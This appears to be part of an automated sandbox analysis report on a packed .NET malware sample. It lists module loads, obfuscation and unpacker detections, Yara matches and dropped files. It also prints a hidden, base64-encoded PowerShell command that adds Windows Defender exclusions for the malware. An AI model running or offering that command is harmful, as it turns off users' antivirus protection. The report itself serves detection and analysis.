                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: taskschd.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sxs.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeSection loaded: wininet.dll
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Fbedztzxbbe.pdb source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.cs.Net Code: Type.GetTypeFromHandle(Khmx1Yt6SBxTndHcLiS.yA0DXaCBy7(16777370)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Khmx1Yt6SBxTndHcLiS.yA0DXaCBy7(16777248)),Type.GetTypeFromHandle(Khmx1Yt6SBxTndHcLiS.yA0DXaCBy7(16777334))})
                    .NET source code contains potential unpacker
                    Source: file.exe, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                    Source: TypeId.exe.0.dr, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.file.exe.84e6078.17.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.file.exe.84e6078.17.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.file.exe.84e6078.17.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.file.exe.84e6078.17.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.file.exe.84e6078.17.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.file.exe.6e10000.14.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.file.exe.6e10000.14.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.file.exe.6e10000.14.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.file.exe.6e10000.14.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.file.exe.6e10000.14.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Suspicious powershell command line found
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.file.exe.459c2e8.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.81dfff8.19.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.8167fb8.22.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4a62b70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.81dfff8.19.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4da8708.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.467db08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.818ffd8.18.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.459c2e8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.8167fb8.22.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.6d60000.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.94c0000.24.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.7596838.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.818ffd8.18.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.txxbiwtbs.exe.7c40000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4c760c8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2976520133.000000000309D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1763526633.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3095261684.0000000007491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2219301967.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2976520133.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1784663616.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3019858995.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1818030083.00000000094C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1995844689.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1763526633.0000000003526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 7600, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TypeId.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: txxbiwtbs.exe PID: 3624, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06100448 push es; retf
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06104D2D push es; iretd
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06100DE0 push es; retf
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06100DE3 push es; retf
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E0459A push ebp; iretd
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E03106 push esp; iretd
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_071029E9 push eax; retf
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09E55BE0 push ebp; iretd
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09E55FB2 push ecx; iretd
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09E57361 push edx; iretd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B99D2A5 pushad ; iretd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BB82316 push 8B485F93h; iretd
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_06D55202 push esp; retf
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_06D65C8F push es; retf
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_06D604A1 push es; retf
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_075FB705 push FFFFFF8Bh; iretd
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_075FB475 push FFFFFF8Bh; iretd
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07A7459A push ebp; iretd
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07A73106 push esp; iretd
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07C739A8 push eax; retf 07B2h
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07C73300 pushfd ; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08ADF3E6 push 0B58158Dh; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08ADE79B push cs; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A3B6E01 push 8B04568Bh; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A3B6FBD push 8B0476FFh; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A3B6D74 push 8B04568Bh; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A9A2F91 push cs; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A9A2F11 push cs; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A9A103F push cs; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A9A2836 push cs; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A9A29E9 push eax; retf
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.csHigh entropy of concatenated method names: 'I9M4QO4qB2a0IXiJetI', 'b6wj1A4aYmFuI0OhGoj', 'Iq5ou9bf1s', 'aAjRmY46l9nRDybJZAs', 'hF7CKc4JBtaJDC4fcIW', 'IIudEc4UKfLbr0oA3uh', 'yKnaIq4b7l4t2has25F', 'CGgZxt4mLE0QvjZde3S', 'kDQRMv4ORicQjvOUf1h', 'VdinR24lwqPMsw03Gur'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'Wu1953XvgCs8K9qZkQt'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, Wqs5URts4KOjaidB9QJ.csHigh entropy of concatenated method names: 'YBNaqvLQSi', 'pvCaaUlNbv', 'VkoaBc4DHI', 'WUKawN2oxw', 'J85a9UGWOg', 'heEa6lZuUB', 'paNaJeg9e4', 'eeyiRIndE8', 'WHkaUGJDqh', 'tw4abJLijJ'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, gWwFh6uutZrgsqwKKY.csHigh entropy of concatenated method names: 'TBIgfxPCab', 'TJ1ggw33WF', 'e6fgrHXbEm', 'hu3gYoFsZN', 'fNPgTxIx2Q', 'CdRgCV1Li1', 'IILgpN3iiP', 'RAmgcXnOiK', 'Bd7goHmTqU', 'LRWgtVbJQT'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, Wbs8nJYojjAvBw9Hhml.csHigh entropy of concatenated method names: 'D1EYiO6J8K', 'xwTYRgTVux', 'vJlY0SGosW', 'zq2Yxyrt08', 'aP0IboXq4hTeF0gQ9wJ', 'dVxZKYXa6LclnuJ5ee6', 'pQ9JfpXBPiH7T4Vcrta'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, J6tGnyHiUI5UPRSjfZ.csHigh entropy of concatenated method names: 'U70jBSXn5', 'dMqLWJfnG', 'IrkEltLsS', 'Fr978ENva', 'To5PjKBDa', 'ITtn1AeTu', 'vJgMmdatA', 'US5AQ3bYV', 'T6m0dnkB6kSpsMRXfpN', 'lQsld7kw4Lynf8VnZrJ'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, Khmx1Yt6SBxTndHcLiS.csHigh entropy of concatenated method names: 'yA0DXaCBy7', 'PLKD8ijtF0', 'rK8Nbk4VQ8s3xgVtxaM', 'uhkw3u4DDAijN7TSpEl', 'bZsmiM4SaUIiCG2pVVO', 'Jf4qWj4slcbkra3Lago', 'BV8jOd4vtlorEUV1k4C', 'ceUqK84HTAtTTIEGh89'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, qHLtQPrzIOZ8bY0fBih.csHigh entropy of concatenated method names: 'sayYgnSNDo', 'yw9YryL69X', 'OYPYYS8uP8', 'dCgYTJMxJc', 'tarYCPE8Af', 'iXGYp6FjBE', 'JQqf0cXfrZlBlmrY9Ly', 'vyxcZ7XgJHoWaIVFIRE', 'tM0wuAXrTnrcQ6M49E3', 'JpoKKlXY78EwjY9LQAg'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, EgOZ8Bh7IS3c7wI5eg.csHigh entropy of concatenated method names: 'zofQGtWwY', 'SXb5B6n9S', 'q7feUEnuH', 'lIMZYRRiF', 'X7gKuDU4u', 'MvQ1Qs4Zp', 'sZuywDECs', 'A0Md2IxGc', 'i7rkK8RKD', 'rQnXW5MIl'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, bkFcHwrdJkSsEUL23AN.csHigh entropy of concatenated method names: 'IFIrSDbbfZ', 'nkSrsQu8BQ', 'WSUrXoqqL2', 'kKQr8IubBs', 'XAwr4AQGkp', 'zYsrNIbDl4', 'UDmryF56xR', 'KA5rGsPscL', 'lwArVbRcYJ', 'xQKrD1Cov0'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, osNFZZtOwYpFwvRLpuE.csHigh entropy of concatenated method names: 'KB1tkQBP5t', 'G10tXsrmIG', 'cxyt85MoHy', 'JOot4HCWPf', 'oTOtNGNTer', 'jf3tyldlb6', 'P6gtGjc00v', 'n5ktVm1yqV', 'JdstDuUIVQ', 'VAVtSjaiid'
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
